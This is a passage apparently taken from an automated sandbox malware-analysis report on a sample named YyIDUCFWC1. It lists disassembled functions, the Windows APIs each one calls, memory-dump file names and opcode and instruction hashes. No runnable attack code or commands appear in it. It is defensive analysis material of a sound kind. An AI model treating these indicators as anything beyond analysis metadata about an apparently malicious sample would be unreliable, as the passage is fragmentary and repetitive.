                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 984130B6900209DFCB04DF99D9848EEBBF4FF89314B61855ED916AB710D730AA05CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE8E20 Relevance: 4.7, APIs: 3, Instructions: 162COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 6CEE8E89
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,00000000), ref: 6CEE8EAD
                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 6CEE8ED2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave_memset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3751686142-0
                                                                                                                                                                                                                                              • Opcode ID: a5c81f813cd7151aef47145814edd751a1daf83b67c23df63eb626b536e4bb7d
                                                                                                                                                                                                                                              • Instruction ID: c2f3d1e62e499795d32590397761c0c37d80350650834d34484787d7ee411ae5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5c81f813cd7151aef47145814edd751a1daf83b67c23df63eb626b536e4bb7d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D517F74A01209AFC754CF58C890F9AB7B6FF49344F20855DE91A9B781CB31EE55CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEED920 Relevance: 4.6, APIs: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6CEED949
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6CEED96C
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEED9CF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$CreateDestroyElementVector
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3149346722-0
                                                                                                                                                                                                                                              • Opcode ID: 44ced335e39c609f3896bebc31c22d40a673fe9d01c3fc34af47fdc463747005
                                                                                                                                                                                                                                              • Instruction ID: 163bb9e5afbe2242bdb3dfea5668e66548511e95346538369b815576870f2da9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44ced335e39c609f3896bebc31c22d40a673fe9d01c3fc34af47fdc463747005
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59215E39601214AFEB12CF54CC84FAB77B8EF8A744F214198E945DB344D7B2DA01DBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEFDB10 Relevance: 4.6, APIs: 3, Instructions: 63COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEFDB2D
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEFDB45
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEFDBA2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$CreateDestroyElementVector
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3149346722-0
                                                                                                                                                                                                                                              • Opcode ID: 95f2bf6466571c19aba2935da662a76fb7f401fc0b353d24cbd67ead0d6bbd3f
                                                                                                                                                                                                                                              • Instruction ID: f2a7173449882783ab60ed21bcaeecd2f9fbea9d32006cc0a3fb193750e6175c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95f2bf6466571c19aba2935da662a76fb7f401fc0b353d24cbd67ead0d6bbd3f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2411BF79741205AFD700DF69C888F9ABFB8FF5A314F158299EA18DB701D730A915CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF03EB0 Relevance: 3.2, APIs: 2, Instructions: 242COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CF04042
                                                                                                                                                                                                                                                • Part of subcall function 6CF39533: std::exception::_Copy_str.LIBCMT ref: 6CF3954E
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF04059
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: std::exception::exception.LIBCMT ref: 6CF39C04
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: std::exception::exception.LIBCMT ref: 6CF39C1E
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: __CxxThrowException@8.LIBCMT ref: 6CF39C2F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8Throw$Copy_strExceptionRaise_mallocstd::exception::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2813683038-0
                                                                                                                                                                                                                                              • Opcode ID: 35c579a40f99a03d7dd0fe37b95b08524157c503b3f3b5ed9d4c76ed6607b4c9
                                                                                                                                                                                                                                              • Instruction ID: f7a3b529bd1a757e0879a925488038ffd60082b19621581d59d0fe19eac9d9a6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35c579a40f99a03d7dd0fe37b95b08524157c503b3f3b5ed9d4c76ed6607b4c9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E091B1B1904704AFD700CF99C841B9AFBF4FF94744F25895EE4199BBA0E7B1D6088B92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEEBDF7 Relevance: 3.2, APIs: 2, Instructions: 200COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEEBE2D
                                                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(00000000,00000008,?,?,?), ref: 6CEEBE6D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroyReadSafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 616443815-0
                                                                                                                                                                                                                                              • Opcode ID: 338116f55210b56042d6b09ee491bedbe8495baf7ae3a9b7ba4a4674b2811d01
                                                                                                                                                                                                                                              • Instruction ID: 0f2bbcdb991a562dee08e52a79b338e21b7212c42a9c672f6d7478152e0e6534
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 338116f55210b56042d6b09ee491bedbe8495baf7ae3a9b7ba4a4674b2811d01
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A712370D0479A5EDB218F758C80669BBB1AB0E26CF38835CD9A497BE6C731D442CB94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE62C0 Relevance: 3.1, APIs: 2, Instructions: 149COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEE6466
                                                                                                                                                                                                                                                • Part of subcall function 6CF39533: std::exception::_Copy_str.LIBCMT ref: 6CF3954E
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEE647D
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2299493649-0
                                                                                                                                                                                                                                              • Opcode ID: c3f03869aae613691dbab261cef8abdac5aa551f0b21f2f6a2cb23865897142c
                                                                                                                                                                                                                                              • Instruction ID: 931d0238b40146a452f0713131d92e461fd271db9ca3a42ddfc2140d2cc385c1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3f03869aae613691dbab261cef8abdac5aa551f0b21f2f6a2cb23865897142c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 145194B14093449FD710CF54C881A4ABBF4FB89744F60596EF95987790D771DA08CB93
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEFD2E0 Relevance: 3.1, APIs: 2, Instructions: 109COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEFD3E8
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEFD3FF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4063778783-0
                                                                                                                                                                                                                                              • Opcode ID: 92bac1ef5e74c53418f6f91322ff89a99ebda34f2badef4afdb91b34816bfa0a
                                                                                                                                                                                                                                              • Instruction ID: 9d4459fb73f430f23ed69ac1d36e99e895167a1d5cfbc69b1ac559a57c652c4e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92bac1ef5e74c53418f6f91322ff89a99ebda34f2badef4afdb91b34816bfa0a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA314D755057059FC704CF29C48099ABBF4FF89714F608A2EF4558BB50EB71EA0ACB92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE8400 Relevance: 3.0, APIs: 2, Instructions: 48COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEE8449
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEE845E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4063778783-0
                                                                                                                                                                                                                                              • Opcode ID: 2f9c693a52a8044f1c5aba104a679f9fc7dfb7218c45678ff5e4b6bc1c84ad7d
                                                                                                                                                                                                                                              • Instruction ID: d4307bd752cb78dd0f5712953569e9dbfa024cccac9963eb3dbe78963087639f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f9c693a52a8044f1c5aba104a679f9fc7dfb7218c45678ff5e4b6bc1c84ad7d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2601A475500208AFCB08DF54D49089ABBF5EF68304B60C1AED91A4BB50DB30EA04CB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 02D5BC88 Relevance: 2.6, Strings: 2, Instructions: 124COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1700874712.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2d50000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (o^q$,bq
                                                                                                                                                                                                                                              • API String ID: 0-3021502629
                                                                                                                                                                                                                                              • Opcode ID: 855528c757c07c10323e05f3e746b06bfaaf9d18c207d68f79bae0f6d48dec1b
                                                                                                                                                                                                                                              • Instruction ID: 432ba08823ff98c81d19ef88e20949363155168787b8bfe767e332474c51591c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 855528c757c07c10323e05f3e746b06bfaaf9d18c207d68f79bae0f6d48dec1b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC51E734A10229DFCF24DF69D988AAEBBF5BF48719F14806AE805A73A4D7709C40CF54
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 05B00000 Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1709698902.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b00000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: TJcq$Te^q
                                                                                                                                                                                                                                              • API String ID: 0-918715239
                                                                                                                                                                                                                                              • Opcode ID: a4c6098a452a6bb3078f25635b649566510858637b9900a3fe1e2b1ed3af0e5b
                                                                                                                                                                                                                                              • Instruction ID: 659607ceb6635c2cf0ad8fff876220f4216166c164f9af57fd401adee8f5a0bb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4c6098a452a6bb3078f25635b649566510858637b9900a3fe1e2b1ed3af0e5b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 543193756093854FC7079B7488686BE7FB1AF97200F0904EAD486DF3D2DA285D09CBA6
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE8D60 Relevance: 2.6, APIs: 2, Instructions: 78COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000,6CEE8C13,?,6CEE8CD3,?,6CEE8C13,00000000,?,?,6CEE8C13,?,?), ref: 6CEE8D73
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,6CEE8CD3,?,6CEE8C13,00000000,?,?,6CEE8C13,?,?), ref: 6CEE8D8C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
